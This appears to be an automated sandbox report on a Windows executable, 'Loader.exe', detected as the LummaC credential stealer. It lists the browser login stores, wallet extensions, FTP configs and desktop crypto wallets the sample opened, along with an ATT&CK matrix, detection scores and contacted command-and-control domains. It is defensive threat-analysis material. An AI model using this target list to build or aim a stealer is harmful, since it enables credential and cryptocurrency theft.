Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\Loader.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 1.2.Loader.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Loader.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Loader.exe.4079550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2477728323.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 DLL Side-Loading	211 Process Injection	23 Virtualization/Sandbox Evasion	2 OS Credential Dumping	231 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	23 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	211 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	31 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	3 Clipboard Data	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Timestomp	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Loader.exe	69%	Virustotal		Browse
Loader.exe	76%	ReversingLabs	ByteCode-MSIL.Trojan.LummaC
Loader.exe	100%	Avira	TR/Kryptik.raqzi

Source	Detection	Scanner	Label
https://areawannte.bet/aRIsjI	0%	Avira URL Cloud	safe
https://areawannte.bet/	0%	Avira URL Cloud	safe
https://areawannte.bet/I	0%	Avira URL Cloud	safe
https://areawannte.bet:443/aRIsj	0%	Avira URL Cloud	safe
https://community.fa?	0%	Avira URL Cloud	safe
https://areawannte.bet:443/aRIsjI	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	92.122.104.90	true	false	high
areawannte.bet	188.114.96.3	true	false	high
modelshiverd.icu	unknown	unknown	false	high
garagedrootz.top	unknown	unknown	false	high
fostinjec.today	unknown	unknown	false	high
catterjur.run	unknown	unknown	false	high
defaulemot.run	unknown	unknown	false	high
sterpickced.digital	unknown	unknown	false	high
arisechairedd.shop	unknown	unknown	false	high
orangemyther.live	unknown	unknown	false	high
begindecafer.world	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://areawannte.bet/aRIsjI	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199822375128	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://player.vimeo.com	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/subscriber_agreement/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.gstatic.cn/recaptcha/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199822375128/badges	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128	Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&l=english&am	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sketchfab.com	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/76561199822375128	Loader.exe, 00000001.00000002.2478791044.000000000107A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com:443/profiles/7656	Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.youtube.com/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://areawannte.bet/I	Loader.exe, 00000001.00000002.2478791044.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/privacy_agreement/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://areawannte.bet/	Loader.exe, 00000001.00000002.2478791044.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/;	Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/about/	Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamloopback.host	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://help.steampowered.com/en/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=1VeaVEsE	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/DP	Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net/recaptcha/;	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=Bdoh	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/L	Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://medal.tv	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://broadcast.st.dl.eccdnx.com	Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fa?	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Gzg8NS4HKwGo&a	Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	false		high
